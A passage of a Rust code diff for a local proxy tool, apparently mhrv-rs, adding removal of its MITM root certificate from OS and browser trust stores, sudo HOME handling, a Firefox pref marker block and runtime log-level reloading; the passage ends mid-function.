-1915,7 +2223,21 @@ fn background_thread(shared: Arc, rx: Receiver) { std::thread::spawn(move || { let base = data_dir::data_dir(); let ca = base.join(CA_CERT_FILE); - let trusted = mhrv_rs::cert_installer::is_ca_trusted(&ca); + let file_exists = ca.exists(); + // Probe the trust store by name — independent of + // whether the on-disk ca.crt happens to be there. + // The file and the trust-store entry can be out of + // sync (e.g. after a partial removal), and that + // mismatch is exactly what Check CA must surface. + let trusted = mhrv_rs::cert_installer::is_ca_trusted_by_name(); + push_log( + &shared2, + &format!( + "[ui] check CA: file={} trust_store={}", + if file_exists { "present" } else { "missing" }, + if trusted { "trusted" } else { "not trusted" }, + ), + ); let mut st = shared2.state.lock().unwrap(); st.ca_trusted = Some(trusted); st.ca_trusted_at = Some(Instant::now()); @@ -1930,7 +2252,10 @@ fn background_thread(shared: Arc, rx: Receiver) { } rt.spawn(async move { let result = mhrv_rs::update_check::check(route).await; - push_log(&shared2, &format!("[ui] update check: {}", result.summary())); + push_log( + &shared2, + &format!("[ui] update check: {}", result.summary()), + ); { let mut st = shared2.state.lock().unwrap(); st.last_update_check = Some(UpdateProbeState::Done(result)); @@ -1990,14 +2315,19 @@ fn background_thread(shared: Arc, rx: Receiver) { /// Install a tracing subscriber that mirrors every log event into the UI's /// Recent log panel. /// -/// Respects `RUST_LOG` if set. Otherwise defaults to `info` — which is what -/// users mean when they pick a non-default log level in the form. (trace / -/// debug flip too much noise for a local GUI, so the combo-box changes level -/// live via the `reload` handle that `with_env_filter` gives us but we keep -/// the default boot-time level at info so first-run behavior is sensible.) -fn install_ui_tracing(shared: Arc) { +/// Filter precedence (issue #401, v1.8.2): +/// 1. `RUST_LOG` env var, if set +/// 2. The saved form's `log_level` (passed in from the loaded config) +/// 3. `info,hyper=warn` as a sensible default +/// +/// The constructed filter is wrapped in a `reload::Layer` and the handle +/// is stashed in `LOG_RELOAD` so that a Save inside the running UI can +/// reinstall the filter without a restart. See `apply_log_level`. +fn install_ui_tracing(shared: Arc, config_level: &str) { use tracing_subscriber::fmt::MakeWriter; - use tracing_subscriber::EnvFilter; + use tracing_subscriber::layer::SubscriberExt; + use tracing_subscriber::util::SubscriberInitExt; + use tracing_subscriber::{reload, EnvFilter}; /// A MakeWriter that pushes each line into the shared log panel. struct UiLogWriter { @@ -2051,19 +2381,71 @@ fn install_ui_tracing(shared: Arc) { } } - let filter = - EnvFilter::try_from_default_env().unwrap_or_else(|_| EnvFilter::new("info,hyper=warn")); + // RUST_LOG > config.log_level > "info,hyper=warn" + let filter = EnvFilter::try_from_default_env().unwrap_or_else(|_| { + let trimmed = config_level.trim(); + if trimmed.is_empty() { + EnvFilter::new("info,hyper=warn") + } else { + EnvFilter::try_new(trimmed).unwrap_or_else(|_| EnvFilter::new("info,hyper=warn")) + } + }); + + let (filter_layer, reload_handle) = reload::Layer::new(filter); + if LOG_RELOAD.set(reload_handle).is_err() { + // Already initialized — install_ui_tracing got called twice. Bail + // silently rather than panic; the existing subscriber stays live. + return; + } let writer = UiLogWriter { shared }; - let _ = tracing_subscriber::fmt() - .with_env_filter(filter) + let fmt_layer = tracing_subscriber::fmt::layer() .with_target(false) .with_ansi(false) - .with_writer(writer) + .with_writer(writer); + + let _ = tracing_subscriber::registry() + .with(filter_layer) + .with(fmt_layer) .try_init(); } +/// Reload handle for the UI's tracing EnvFilter — populated once at startup +/// by `install_ui_tracing`. `apply_log_level` uses it to swap in a new +/// filter when the user clicks Save with a different log level (#401). +static LOG_RELOAD: std::sync::OnceLock< + tracing_subscriber::reload::Handle< + tracing_subscriber::EnvFilter, + tracing_subscriber::Registry, + >, +> = std::sync::OnceLock::new(); + +/// Reinstall the tracing filter at runtime. Called from the Save handler +/// so the user's new `log_level` takes effect without a restart. RUST_LOG +/// still wins if it was set at process start — explicit override beats +/// config in both directions. +fn apply_log_level(level: &str) { + use tracing_subscriber::EnvFilter; + let Some(handle) = LOG_RELOAD.get() else { + return; + }; + if std::env::var_os("RUST_LOG").is_some() { + // RUST_LOG was set explicitly at boot — don't silently override. + return; + } + let trimmed = level.trim(); + let new = if trimmed.is_empty() { + EnvFilter::new("info,hyper=warn") + } else { + match EnvFilter::try_new(trimmed) { + Ok(f) => f, + Err(_) => return, + } + }; + let _ = handle.modify(|f| *f = new); +} + /// Where we drop downloaded release assets. Prefer the OS user Downloads /// dir (via the directories crate that's already in our tree), fall back /// to the user-data dir for platforms that don't expose one (edge case). diff --git a/src/cert_installer.rs b/src/cert_installer.rs index 0d6eb21e..caff2835 100644 --- a/src/cert_installer.rs +++ b/src/cert_installer.rs @@ -1,7 +1,7 @@ -use std::path::Path; +use std::path::{Path, PathBuf}; use std::process::Command; -use crate::mitm::CERT_NAME; +use crate::mitm::{CA_DIR, CERT_NAME}; #[derive(Debug, thiserror::Error)] pub enum InstallError { @@ -11,6 +11,180 @@ pub enum InstallError { Failed, #[error("unsupported platform: {0}")] Unsupported(String), + #[error("io {path}: {source}")] + Io { + path: PathBuf, + #[source] + source: std::io::Error, + }, + #[error("CA still trusted after removal — re-run with admin/sudo")] + RemovalIncomplete, +} + +/// Structured outcome of a successful `remove_ca` call. The OS trust +/// store is always fully clean when we return `Ok(_)` (that's verified +/// by `is_ca_trusted_by_name` before file deletion), but NSS cleanup is +/// best-effort — callers need the nuance to print accurate status. +/// +/// UI/CLI should treat `Clean` as "nothing more to do" and +/// `NssIncomplete` as a non-fatal warning ("OS CA removed, browser +/// cleanup partial — follow the logged hint"). +#[derive(Debug, Clone, Copy)] +pub enum RemovalOutcome { + Clean, + NssIncomplete(NssReport), +} + +impl RemovalOutcome { + /// One-line summary suitable for a log line or status banner. + pub fn summary(&self) -> String { + match self { + RemovalOutcome::Clean => "CA removed.".to_string(), + RemovalOutcome::NssIncomplete(r) if r.tool_missing_with_stores_present => { + "OS CA removed. NSS cleanup skipped — NSS certutil not found.".to_string() + } + RemovalOutcome::NssIncomplete(r) => format!( + "OS CA removed. NSS cleanup partial: {}/{} browser stores updated.", + r.ok, r.tried + ), + } + } +} + +/// When running as root via `sudo`, the process's `HOME` / `USER` +/// environment reflects **root**, not the user who invoked the command. +/// That breaks every user-scoped cert path this module touches — +/// `data_dir()` resolves to root's config dir, `firefox_profile_dirs()` +/// scans root's profiles, macOS `login.keychain-db` is root's. The +/// removal then operates on paths that probably don't exist, reports +/// success, and leaves the real user's CA trusted. +/// +/// This helper detects the real `sudo` case (`geteuid() == 0` AND +/// `SUDO_USER` set to a non-root user), resolves the invoking user's +/// home dir (SUDO_HOME, `getent passwd`, or `/Users/$SUDO_USER` / +/// `/home/$SUDO_USER` fallback), and rewrites `HOME` for the remainder +/// of the process. The EUID gate is load-bearing: `SUDO_USER` alone is +/// not proof of elevation (a user can export it, inherit it, or use +/// `sudo -E`), and blindly trusting it would let a non-root process +/// redirect config/CA/profile operations to another user's files. +/// Call once at the top of `main` in every binary (CLI + UI) before +/// anything else reads HOME. No-op on Windows (UAC keeps the user's +/// HOME intact) and on non-sudo Unix invocations. +pub fn reconcile_sudo_environment() { + #[cfg(unix)] + unix::reconcile_sudo_home(); +} + +#[cfg(unix)] +mod unix { + use super::{should_reconcile_for, sudo_parse_passwd_home}; + use std::path::Path; + use std::process::Command; + + pub(super) fn reconcile_sudo_home() { + // SAFETY: geteuid() is async-signal-safe and cannot fail. + let euid = unsafe { libc::geteuid() }; + let sudo_user_raw = std::env::var("SUDO_USER").ok(); + let Some(sudo_user) = should_reconcile_for(euid, sudo_user_raw.as_deref()) else { + return; + }; + let sudo_user = sudo_user.to_string(); + match resolve_home(&sudo_user) { + Some(home) => { + tracing::info!( + "Detected sudo invocation (SUDO_USER={}): re-rooting HOME to {} \ + so user-scoped cert paths target the real user.", + sudo_user, + home + ); + // SAFETY: reconcile_sudo_environment runs at the top of + // main() before any other thread is spawned and before + // any code has cached HOME. + std::env::set_var("HOME", home); + } + None => { + tracing::warn!( + "Running under sudo (SUDO_USER={}), but could not resolve \ + the user's home dir. Cert paths will operate on root's \ + HOME — which may NOT match where you installed the CA. \ + Prefer running without sudo; the app invokes sudo \ + internally for system-level steps.", + sudo_user + ); + } + } + } + + fn resolve_home(sudo_user: &str) -> Option { + // Some sudoers configs export SUDO_HOME; prefer it when present. + if let Ok(h) = std::env::var("SUDO_HOME") { + if !h.is_empty() { + return Some(h); + } + } + // Linux: `getent passwd ` returns the full passwd entry. + if let Ok(out) = Command::new("getent").args(["passwd", sudo_user]).output() { + if out.status.success() { + let line = String::from_utf8_lossy(&out.stdout); + if let Some(h) = sudo_parse_passwd_home(&line) { + return Some(h); + } + } + } + // macOS has no getent. Fall back to the convention for both + // platforms — verify the dir actually exists before returning. + for root in ["/Users", "/home"] { + let candidate = format!("{}/{}", root, sudo_user); + if Path::new(&candidate).exists() { + return Some(candidate); + } + } + None + } +} + +/// Decide whether to re-root HOME for a sudo-style invocation, given a +/// process's effective UID and the value of the `SUDO_USER` env var. +/// Returns `Some(user)` if and only if we should re-root HOME to that +/// user's dir; `None` in every other case (normal user, real root +/// login without sudo, SUDO_USER missing / empty / literally "root"). +/// +/// Extracted as a pure function so every branch — including the +/// load-bearing `euid == 0 && SUDO_USER unset` path that must leave +/// HOME as root's own /root — can be asserted with unit tests. +/// Always compiled so the tests run on every host. +fn should_reconcile_for<'a>(euid: u32, sudo_user: Option<&'a str>) -> Option<&'a str> { + // EUID gate: if we're not actually root, `SUDO_USER` could be + // anything (inherited from a shell init, explicitly exported, + // set via `sudo -E`) and rewriting HOME based on it would let a + // normal-user process redirect cert paths to someone else's files. + if euid != 0 { + return None; + } + // Real root login (no sudo) — SUDO_USER is simply unset. Do NOT + // re-root: root's own /root is the correct HOME for that process. + let user = sudo_user?; + // Empty string or literal "root" also mean "nothing to reconcile". + if user.is_empty() || user == "root" { + return None; + } + Some(user) +} + +/// Pure parser for a single-line `getent passwd` entry. +/// Always compiled so unit tests can run on every host. +fn sudo_parse_passwd_home(content: &str) -> Option { + let line = content.lines().next()?; + let fields: Vec<&str> = line.split(':').collect(); + // passwd format: name:pw:uid:gid:gecos:home:shell + if fields.len() < 7 { + return None; + } + let home = fields[5].trim(); + if home.is_empty() { + return None; + } + Some(home.to_string()) } /// Install the CA certificate at `path` into the system trust store. @@ -46,12 +220,108 @@ pub fn install_ca(path: &Path) -> Result<(), InstallError> { } } +/// Remove the CA from the OS trust store, best-effort NSS stores (Firefox +/// profiles + Chrome/Chromium on Linux), and delete the on-disk +/// `ca/ca.crt` + `ca/ca.key`. A fresh CA will be regenerated the next +/// time the proxy starts — and since the Apps Script deployment lives on +/// Google's side and `config.json` is never touched here, the user does +/// not have to redeploy `Code.gs` or re-enter their deployment ID. +/// Platform-specific — may require admin/sudo for system stores. +/// +/// Safety property: we verify the OS trust store with `is_ca_trusted` +/// before deleting `ca/`. If the stale root is still trusted (e.g. +/// because the system-store delete needed admin and we didn't have it), +/// we return `RemovalIncomplete` and leave the on-disk files alone — a +/// regenerated CA with a fresh keypair would otherwise mismatch the +/// stale trusted root and silently break every HTTPS MITM leaf. +pub fn remove_ca(base: &Path) -> Result { + let os = std::env::consts::OS; + tracing::info!("Removing CA certificate on {}...", os); + + // Platforms that merge anchor files into a bundle/database (Linux) + // must report whether the refresh step succeeded — the bundle may + // still contain the CA even after the anchor file is gone. macOS + // and Windows write directly to their stores, so there's nothing + // separate to refresh; they rely entirely on the by-name probe. + let platform_ok = match os { + "macos" => { + remove_macos(); + true + } + "linux" => remove_linux(), + "windows" => { + remove_windows(); + true + } + other => return Err(InstallError::Unsupported(other.to_string())), + }; + + // Verify OS trust store removal BEFORE touching browser state. If + // the OS removal didn't actually land (e.g. machine-store delete + // needed admin we don't have, or a Linux refresh cmd failed), we + // must not also strip NSS entries + the Firefox enterprise_roots + // pref — that leaves the system in an inconsistent "half-removed" + // state (OS still trusts, but Firefox is newly reconfigured) that + // only confuses the user. Returning RemovalIncomplete here keeps + // the install pristine so a retry is idempotent. + // + // Must be path-independent — the on-disk cert file may already be + // missing for unrelated reasons, and a file-gated check would then + // mask a still-trusted stale root. + if !platform_ok || is_ca_trusted_by_name() { + tracing::error!( + "MITM CA is still trusted after OS removal attempt \ + (platform_ok={}) — refusing to touch browser state or \ + delete on-disk files. Re-run with admin/sudo to complete \ + revocation.", + platform_ok + ); + return Err(InstallError::RemovalIncomplete); + } + + // OS store is clean — only now mutate browser state. + let nss = remove_nss_stores(); + + let ca_dir = base.join(CA_DIR); + if ca_dir.exists() { + if let Err(e) = std::fs::remove_dir_all(&ca_dir) { + tracing::error!("failed to delete {}: {}", ca_dir.display(), e); + return Err(InstallError::Io { + path: ca_dir.clone(), + source: e, + }); + } + tracing::info!("Deleted CA files at {}", ca_dir.display()); + } + + if nss.is_clean() { + Ok(RemovalOutcome::Clean) + } else { + Ok(RemovalOutcome::NssIncomplete(nss)) + } +} + /// Heuristic check: is the CA already in the trust store? /// Best-effort — on unknown state we return false to always attempt install. +/// +/// The `path` guard skips the trust-store probe when the local CA file +/// is missing, because at install time "no file = nothing to trust" is a +/// useful shortcut. Revocation uses `is_ca_trusted_by_name` instead — +/// that path must verify the store regardless of whether the file still +/// exists, otherwise a pre-deleted `ca.crt` would mask a lingering +/// trusted root. pub fn is_ca_trusted(path: &Path) -> bool { if !path.exists() { return false; } + is_ca_trusted_by_name() +} + +/// Path-independent variant of `is_ca_trusted`: queries the OS trust +/// store by cert name (CERT_NAME) without requiring the on-disk cert +/// file. Used by `remove_ca` to verify revocation completed even if the +/// local `ca.crt` was already missing or deleted mid-flight. +pub fn is_ca_trusted_by_name() -> bool { match std::env::consts::OS { "macos" => is_trusted_macos(), "linux" => is_trusted_linux(), @@ -115,6 +385,73 @@ fn install_macos(cert_path: &str) -> bool { false } +/// Delete the CA from the login keychain (no sudo) and, only when a +/// probe confirms the cert actually lives there, the system keychain +/// (sudo). Probing first avoids prompting the user — or hanging the +/// UI's GUI-spawned `sudo` — for a password they don't need when the +/// cert was only ever installed in the login keychain (the default +/// path). Exit status is best-effort: `security delete-certificate` +/// exits non-zero for "not found", which is indistinguishable from +/// real failures, so the final trust state is verified by the caller +/// via `is_ca_trusted_by_name`. +fn remove_macos() { + let home = std::env::var("HOME").unwrap_or_default(); + let login_kc_db = format!("{}/Library/Keychains/login.keychain-db", home); + let login_kc = format!("{}/Library/Keychains/login.keychain", home); + let login_keychain = if Path::new(&login_kc_db).exists() { + login_kc_db + } else { + login_kc + }; + + let res = Command::new("security") + .args(["delete-certificate", "-c", CERT_NAME, &login_keychain]) + .status(); + if matches!(res, Ok(s) if s.success()) { + tracing::info!("Removed CA from login keychain."); + } + + if macos_system_keychain_has() { + let res = Command::new("sudo") + .args([ + "security", + "delete-certificate", + "-c", + CERT_NAME, + "/Library/Keychains/System.keychain", + ]) + .status(); + if matches!(res, Ok(s) if s.success()) { + tracing::info!("Removed CA from System keychain."); + } else { + tracing::warn!( + "System keychain still has the CA and the sudo delete did not \ + succeed — re-run with an admin password available." + ); + } + } +} + +/// Probe-without-sudo: does the System keychain currently contain our +/// cert? `security find-certificate` against the system keychain path +/// does not require admin; only `delete-certificate` does. Used to +/// decide whether to escalate at all. +fn macos_system_keychain_has() -> bool { + let out = Command::new("security") + .args([ + "find-certificate", + "-a", + "-c", + CERT_NAME, + "/Library/Keychains/System.keychain", + ]) + .output(); + match out { + Ok(o) => o.status.success() && !o.stdout.is_empty(), + Err(_) => false, + } +} + fn is_trusted_macos() -> bool { let out = Command::new("security") .args(["find-certificate", "-a", "-c", CERT_NAME]) @@ -142,7 +479,10 @@ fn install_linux(cert_path: &str) -> bool { try_copy_and_run(cert_path, &dest, &[&["update-ca-trust", "extract"]]) } "arch" => { - let dest = format!("/etc/ca-certificates/trust-source/anchors/{}.crt", safe_name); + let dest = format!( + "/etc/ca-certificates/trust-source/anchors/{}.crt", + safe_name + ); try_copy_and_run(cert_path, &dest, &[&["trust", "extract-compat"]]) } "openwrt" => { @@ -154,7 +494,8 @@ fn install_linux(cert_path: &str) -> bool { "OpenWRT detected: the router doesn't need to trust the MITM CA. \ Copy {} to each LAN client (browser / OS trust store) instead. \ Example: scp root@:{} ./ and import from there.", - cert_path, cert_path + cert_path, + cert_path ); true } @@ -253,7 +594,11 @@ fn classify_os_release(content: &str) -> String { Some(x) => x, None => continue, }; - let v = v.trim().trim_matches('"').trim_matches('\'').to_ascii_lowercase(); + let v = v + .trim() + .trim_matches('"') + .trim_matches('\'') + .to_ascii_lowercase(); match k.trim() { "ID" => id = v, "ID_LIKE" => id_like = v, @@ -281,13 +626,103 @@ fn classify_os_release(content: &str) -> String { "unknown".into() } +/// Mirror of `install_linux`: for each known anchor dir, delete our cert +/// file and run the corresponding refresh command. Tries without sudo +/// first, falls back to sudo. Missing files are silently skipped — +/// removal is idempotent. +/// +/// Key safety behavior: we refresh the trust bundle **regardless of +/// whether we found an anchor file to delete**. The concern is a retry +/// after a prior run that deleted the anchor but failed to refresh — +/// leaving the merged bundle still containing our PEM. On the next +/// invocation the anchor dir is empty, so a "delete file, then refresh" +/// contract would skip the refresh entirely and `remove_ca` would see +/// no anchor file left, declare success, and delete `ca/` while the +/// stale root is still trusted. Running the refresh unconditionally +/// catches this. +/// +/// Returns `false` if any refresh command failed — callers must then +/// abort file deletion so a regenerated CA with a fresh keypair can't +/// mismatch the stale root. +fn remove_linux() -> bool { + let safe_name = CERT_NAME.replace(' ', "_"); + let anchors: &[(&str, &[&str])] = &[ + ( + "/usr/local/share/ca-certificates", + &["update-ca-certificates"], + ), + ( + "/etc/pki/ca-trust/source/anchors", + &["update-ca-trust", "extract"], + ), + ( + "/etc/ca-certificates/trust-source/anchors", + &["trust", "extract-compat"], + ), + ]; + + let mut all_ok = true; + for (dir, refresh) in anchors { + // Skip distros whose anchor dir doesn't exist — running their + // refresh tool (e.g. `trust extract-compat` on a Debian host) + // would just error out and falsely mark the removal as failed. + if !Path::new(dir).exists() { + continue; + } + + let path = format!("{}/{}.crt", dir, safe_name); + let anchor_present = Path::new(&path).exists(); + if anchor_present { + let deleted = + std::fs::remove_file(&path).is_ok() || run_cmd(&["sudo", "rm", "-f", &path]); + if !deleted { + tracing::warn!("failed to remove {}", path); + all_ok = false; + continue; + } + } + + // Always refresh — see doc comment for the retry-safety rationale. + let refreshed = run_cmd(refresh) || { + let mut full: Vec<&str> = vec!["sudo"]; + full.extend_from_slice(refresh); + run_cmd(&full) + }; + if !refreshed { + tracing::error!( + "refresh {:?} failed for {} — CA may still be trusted via the merged bundle", + refresh, + dir + ); + all_ok = false; + } else if anchor_present { + tracing::info!("Removed CA from {} (bundle refreshed).", dir); + } else { + tracing::debug!("Refreshed {} bundle (nothing to delete here).", dir); + } + } + all_ok +} + fn is_trusted_linux() -> bool { - let anchor_dirs = [ + // Check both the anchor dirs (what we write into on install) and + // the post-extract dirs (where update-ca-certificates / `trust + // extract-compat` etc. copy or symlink our PEM after refresh). + // Checking the post-extract side catches the "anchor file already + // removed but bundle not regenerated" case on a retry — if we only + // looked at anchor dirs, a `remove_ca` retry after a prior refresh + // failure could declare success while the merged bundle still + // contains our stale root. + let dirs = [ "/usr/local/share/ca-certificates", "/etc/pki/ca-trust/source/anchors", "/etc/ca-certificates/trust-source/anchors", + // Post-extract locations: + "/etc/ssl/certs", + "/etc/pki/ca-trust/extracted/pem/directory-hash", + "/etc/ca-certificates/extracted/cadir", ]; - for d in anchor_dirs { + for d in dirs { if let Ok(entries) = std::fs::read_dir(d) { for e in entries.flatten() { let name = e.file_name(); @@ -310,24 +745,33 @@ fn is_trusted_linux() -> bool { /// false on Windows, so the Check-CA button was misleading users into /// reinstalling a cert that was already trusted. fn is_trusted_windows() -> bool { - // `certutil -user -store Root ` prints the matching cert entries - // on success (stdout), and exits with a non-zero code plus a "Not - // found" message if nothing matches. We also check stdout for the - // cert name because certutil in some locales returns 0 even on no- - // match, just with empty output. - for args in [ - vec!["-user", "-store", "Root", CERT_NAME], - vec!["-store", "Root", CERT_NAME], - ] { - let out = Command::new("certutil").args(&args).output(); - if let Ok(o) = out { + windows_store_has(true) || windows_store_has(false) +} + +/// Query a single Windows Trusted Root store for our CA. +/// `user = true` hits the current-user store (no admin needed); +/// `user = false` hits the machine store. `certutil -store Root ` +/// prints the matching cert entries on success and exits non-zero with +/// "Not found" if nothing matches — we also check stdout for the cert +/// name because certutil in some locales returns 0 on no-match with +/// empty output. +fn windows_store_has(user: bool) -> bool { + let mut args: Vec<&str> = Vec::new(); + if user { + args.push("-user"); + } + args.extend(["-store", "Root", CERT_NAME]); + let out = Command::new("certutil").args(&args).output(); + match out { + Ok(o) => { let stdout = String::from_utf8_lossy(&o.stdout); - if o.status.success() && stdout.to_ascii_lowercase().contains(&CERT_NAME.to_ascii_lowercase()) { - return true; - } + o.status.success() + && stdout + .to_ascii_lowercase() + .contains(&CERT_NAME.to_ascii_lowercase()) } + Err(_) => false, } - false } fn install_windows(cert_path: &str) -> bool { @@ -355,6 +799,47 @@ fn install_windows(cert_path: &str) -> bool { false } +/// Delete from user and/or machine Trusted Root stores. We probe each +/// store first with `certutil -store` and only attempt the delete where +/// the cert actually lives — this avoids the confusing "needs elevation" +/// error that `-delstore Root` would print when the cert was only ever +/// installed in the per-user store (the default path for non-admin +/// runs). Final state is verified by the caller via `is_ca_trusted`. +fn remove_windows() { + let mut any = false; + + if windows_store_has(true) { + let res = Command::new("certutil") + .args(["-delstore", "-user", "Root", CERT_NAME]) + .status(); + if matches!(res, Ok(s) if s.success()) { + tracing::info!("Removed CA from Windows user Trusted Root store."); + any = true; + } else { + tracing::warn!("failed to remove CA from Windows user Trusted Root store"); + } + } + + if windows_store_has(false) { + let res = Command::new("certutil") + .args(["-delstore", "Root", CERT_NAME]) + .status(); + if matches!(res, Ok(s) if s.success()) { + tracing::info!("Removed CA from Windows machine Trusted Root store."); + any = true; + } else { + tracing::warn!( + "failed to remove CA from Windows machine Trusted Root store \ + (run as administrator to complete)" + ); + } + } + + if !any { + tracing::info!("No MITM CA found in Windows Trusted Root stores."); + } +} + // ---------- NSS (Firefox + Chrome/Chromium on Linux) ---------- /// Best-effort install of the CA into all discovered NSS stores: @@ -440,43 +925,36 @@ fn install_nss_stores(cert_path: &str) { /// certutil isn't typically installed so the certutil-based path doesn't /// fire there. /// -/// Existing user.js entries for other prefs are preserved by appending -/// rather than truncating. Idempotent. +/// We tag the block we write with a sentinel marker comment on the line +/// above the pref, so uninstall can prove ownership before removing it — +/// the user may have had `security.enterprise_roots.enabled = true` +/// before this app existed, and we must not silently revoke their +/// setting. Idempotent. fn enable_firefox_enterprise_roots() { - const PREF: &str = r#"user_pref("security.enterprise_roots.enabled", true);"#; let mut touched = 0; for profile in firefox_profile_dirs() { let user_js = profile.join("user.js"); let existing = std::fs::read_to_string(&user_js).unwrap_or_default(); - if existing.contains("security.enterprise_roots.enabled") { - // Already set by us or the user. Replace-or-keep: if they set it - // to false we leave their choice alone. If it's already our line - // verbatim, nothing to do. - if existing.contains(PREF) { - continue; + match add_enterprise_roots_block(&existing) { + EnterpriseRootsEdit::AddedBlock(new) => { + if let Err(e) = std::fs::write(&user_js, new) { + tracing::debug!( + "firefox profile {}: user.js write failed: {}", + profile.display(), + e + ); + continue; + } + touched += 1; + } + EnterpriseRootsEdit::AlreadyOurs => {} + EnterpriseRootsEdit::UserOwned => { + tracing::debug!( + "firefox profile {} already has a user-owned enterprise_roots pref; leaving alone", + profile.display() + ); } - // Different value present — don't overwrite. - tracing::debug!( - "firefox profile {} already has a different enterprise_roots pref; leaving alone", - profile.display() - ); - continue; - } - let mut out = existing; - if !out.is_empty() && !out.ends_with('\n') { - out.push('\n'); - } - out.push_str(PREF); - out.push('\n'); - if let Err(e) = std::fs::write(&user_js, out) { - tracing::debug!( - "firefox profile {}: user.js write failed: {}", - profile.display(), - e - ); - continue; } - touched += 1; } if touched > 0 { tracing::info!( @@ -486,16 +964,130 @@ fn enable_firefox_enterprise_roots() { } } +// ── Firefox enterprise_roots marker-block helpers (pure, testable) ── +// +// We write a two-line block into user.js — a sentinel comment followed +// by the pref itself. The marker proves we wrote it, so uninstall can +// distinguish our own line from a user-authored one with the same +// value. Any user-authored `security.enterprise_roots.enabled` line +// (with or without our marker above it) means "hands off". +const FX_MARKER: &str = "// mhrv-rs: auto-added, safe to strip with --remove-cert"; +const FX_PREF: &str = r#"user_pref("security.enterprise_roots.enabled", true);"#; + +#[derive(Debug, PartialEq, Eq)] +enum EnterpriseRootsEdit { + AddedBlock(String), + AlreadyOurs, + UserOwned, +} + +/// Append our marker+pref block to `existing` unless (a) it's already +/// there verbatim (idempotent no-op), or (b) the user has their own +/// `enterprise_roots` pref that we didn't write — in which case we +/// leave everything alone. +fn add_enterprise_roots_block(existing: &str) -> EnterpriseRootsEdit { + if contains_our_block(existing) { + return EnterpriseRootsEdit::AlreadyOurs; + } + if existing.contains("security.enterprise_roots.enabled") { + return EnterpriseRootsEdit::UserOwned; + } + let mut out = existing.to_string(); + if !out.is_empty() && !out.ends_with('\n') { + out.push('\n'); + } + out.push_str(FX_MARKER); + out.push('\n'); + out.push_str(FX_PREF); + out.push('\n'); + EnterpriseRootsEdit::AddedBlock(out) +} + +/// Strip our marker+pref block from `existing` if present. If the pref +/// exists without our marker directly above it, the user owns it — we +/// cannot prove otherwise and leave user.js untouched. +/// +/// Consequence for upgrades from pre-marker versions of this app: the +/// legacy bare pref line stays orphaned in user.js after uninstall. +/// That's cosmetic only (Firefox falls back to its built-in root store +/// the moment the CA leaves the OS trust store), and it's the +/// conservative tradeoff — a bare `enterprise_roots = true` line is +/// indistinguishable from a user- or enterprise-policy-authored one, +/// and silently revoking that would break unrelated Firefox trust +/// behavior. README documents the orphan. +fn strip_enterprise_roots_block(existing: &str) -> Option { + if !contains_our_block(existing) { + return None; + } + let lines: Vec<&str> = existing.lines().collect(); + let mut out: Vec<&str> = Vec::with_capacity(lines.len()); + let mut i = 0; + while i < lines.len() { + let is_marker = lines[i].trim() == FX_MARKER; + let next_is_our_pref = lines.get(i + 1).map_or(false, |l| l.trim() == FX_PREF); + if is_marker && next_is_our_pref { + i += 2; + continue; + } + out.push(lines[i]); + i += 1; + } + let mut joined = out.join("\n"); + if existing.ends_with('\n') && !joined.is_empty() { + joined.push('\n'); + } + Some(joined) +} + +/// True iff `existing` contains our sentinel directly above our pref. +fn contains_our_block(existing: &str) -> bool { + let mut prev: Option<&str> = None; + for line in existing.lines() { + if prev.map(|p| p.trim()) == Some(FX_MARKER) && line.trim() == FX_PREF { + return true; + } + prev = Some(line); + } + false +} + +/// True iff `existing` has our exact pref line but NOT inside our +/// marker+pref block — i.e. an orphan `security.enterprise_roots.enabled +/// = true` whose provenance we can't prove. Used by +/// `disable_firefox_enterprise_roots` to surface a one-line hint on +/// uninstall so users upgrading from pre-v1.2.13 installs know their +/// Firefox user.js still has a cosmetic orphan pref from the old app +/// (not broken, just left in place because we can't distinguish it +/// from a user-authored line). +fn has_bare_enterprise_roots(existing: &str) -> bool { + if contains_our_block(existing) { + return false; + } + existing.lines().any(|l| l.trim() == FX_PREF) +} + fn has_nss_certutil() -> bool { + // We want NSS's `certutil` (from libnss3-tools), not Windows's + // built-in `certutil.exe` which shares the binary name but has + // completely different semantics. The previous heuristic looked + // for "-d" in help output, which false-positived on Windows + // because `-dump` / `-dumpPFX` are in the Windows help text. + // + // "nickname" is an NSS-specific concept (single-letter batch verbs + // like `-A`/`-D`/`-n nickname`); the Windows and macOS built-in + // certutils don't use that term. Matching on it reliably + // discriminates. Command::new("certutil") .arg("--help") .output() .ok() .map(|o| { - // macOS has a different certutil built-in that doesn't support -d. - // NSS-specific help output mentions the -d / -n flags. - String::from_utf8_lossy(&o.stderr).contains("-d") - || String::from_utf8_lossy(&o.stdout).contains("-d") + let combined = format!( + "{}{}", + String::from_utf8_lossy(&o.stderr), + String::from_utf8_lossy(&o.stdout) + ); + combined.to_ascii_lowercase().contains("nickname") }) .unwrap_or(false) } @@ -516,15 +1108,7 @@ fn install_nss_in_dir(dir_arg: &str, cert_path: &str) -> bool { let res = Command::new("certutil") .args([ - "-A", - "-n", - CERT_NAME, - "-t", - "C,,", - "-d", - dir_arg, - "-i", - cert_path, + "-A", "-n", CERT_NAME, "-t", "C,,", "-d", dir_arg, "-i", cert_path, ]) .output(); match res { @@ -559,6 +1143,226 @@ fn install_nss_in_profile(profile: &Path, cert_path: &str) -> bool { install_nss_in_dir(&dir_arg, cert_path) } +/// Best-effort reverse of `install_nss_stores`: delete our cert from +/// every Firefox profile NSS DB we can find, plus the shared Chrome/ +/// Chromium NSS DB on Linux, and remove the user.js pref we added. +/// +/// NSS cleanup is explicitly best-effort — `certutil` from libnss3-tools +/// may be missing, a DB may be locked by a running Firefox/Chrome, or +/// the delete may fail for reasons we can't distinguish. When that +/// happens we log a manual-cleanup hint but don't fail the whole +/// revocation. Callers of `remove_ca` should convey this to users so +/// the `--remove-cert` promise is "OS trust store + best-effort NSS", +/// not "guaranteed NSS". +/// Outcome of an NSS cleanup pass. `tried` / `ok` let callers render +/// accurate messages like "NSS cleanup partial: 1/3 stores updated". +/// `tool_missing_with_stores_present` flags the case where we found +/// Firefox/Chrome NSS DBs but NSS `certutil` isn't on PATH — surfaced +/// so the UI/CLI can tell the user why the cleanup is incomplete. +#[derive(Debug, Clone, Copy, Default)] +pub struct NssReport { + pub tried: usize, + pub ok: usize, + pub tool_missing_with_stores_present: bool, +} + +impl NssReport { + pub fn is_clean(&self) -> bool { + !self.tool_missing_with_stores_present && self.tried == self.ok + } +} + +fn remove_nss_stores() -> NssReport { + disable_firefox_enterprise_roots(); + + if !has_nss_certutil() { + // Only warn if there's actually an NSS store we can see — if the + // user never ran Firefox/Chrome on this machine there's nothing + // to clean up either way. + let profiles = firefox_profile_dirs(); + let chrome_present: 